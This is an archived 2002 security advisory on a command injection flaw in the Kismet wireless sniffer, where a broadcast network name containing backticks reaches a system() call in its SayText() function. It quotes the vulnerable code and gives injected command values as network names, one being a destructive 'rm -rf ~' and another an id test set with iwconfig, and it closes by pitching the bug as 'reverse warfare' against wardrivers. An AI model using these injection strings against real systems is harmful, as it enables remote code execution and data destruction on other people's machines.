Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps A-M :: lnx5435.htm

Kismet wireless sniffer local and remote vulnerabilities
14th Jun 2002 [SBWID-5435]

	Kismet wireless sniffer local and remote vulnerabilities


	Versions prior to 2.2.2


	KF [] found following:

	I have discovered  2  potentially  exploitable  holes  in  the  wireless
	sniffer package Kismet. Both issues have been addressed by  the  author.
	I am in the process of determining if the local  command  line  overflow
	is exploitable or not. The other issue may be dependant on  if  your  OS
	will allow you to specify an essid  containing  a  backtick  or  a  pipe

	May 28 2002  2.2.2  !! 2.2.2 released - fixes potentially exploitable remote

	                       hole in Festival saytext. !!

	May 27 2002  2.2.1  !! 2.2.1 released - potentially exploitable local root

	                       hole fixed !!




	Possible  remote  code  execution  via  SayText()  function  of   Kismet
	wireless sniffer

	If your OS allows essids to  contain  `  or  |  and  it  allows  you  to
	broadcast them... then  this  could  be  used  to  help  abuse  someones
	wireless sniffer.

	Kismet does the following


	// Fork and run a system call to play a sound

	void SayText(string player, string text) {

	   char snd_call[1024];


	   snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' | %s &\", 




	   if (system(snd_call) < 0) {




	so if my network name is `/bin/sh -c rm -rf ~` then thats a problem

	This function is called in 2 places....


	./    snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' 

	| %s &\", text.c_str(),

	./                    SayText(festival, text);

	./ SayText(string player, string text) {

	./    snprintf(snd_call, 1024, \"echo \'(SayText \\\"%s\\\")\' 

	| %s >/dev/null 2>/dev/null &\", text.c_str(),

	./                    SayText(festival, text);



	My linux box appears to be able to supply an essid with a backtick


	[root@localhost <mailto:root@localhost> root]# iwconfig eth0 essid \"\\`/bin/sh -c id\\`\"

	[root@localhost <mailto:root@localhost> root]# iwconfig eth0

	eth0      IEEE 802.11-DS  ESSID:\"`/bin/sh -c id`\"  Nickname:\"Prism  I\"

	         Mode:Managed  Frequency:42.9497GHz  Access Point: 


	         Bit Rate:2Mb/s   Tx-Power=15 dBm   Sensitivity:1/3

	         Retry min limit:8   RTS thr:off   Fragment thr:off

	         Encryption key:off

	         Power Management:off



	This is to proove the theory... I think since iwconfig  lets  it  happen
	above this is a valid test. My apple base station would NOT allow  `  or
	| in its network name so this is all I can do to test this theory.

	in kismet_server.c make the following change.


	        snprintf(text, 100, \"New %s network \'%s\' detected.\",

	                            (info.wep ? \"En-crypted\" : \"Un-en-crypted\"),


	                            \"`/bin/sh -c id`\");



	upon firing up the server I was greeted by festival in a british  accent
	saying \"U I D equals zero G I D equals zero ...\" once  I  dectected  a
	valid network. again this would require you to  create  a  valid  packet
	with the info.ssid set to your command enclosed in  backticks.  Above  I
	forced this data...

	This could be a nice form of reverse warfare  for  \"Wardrivers\"  using
	kismet. have fun



	Use latest version.



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH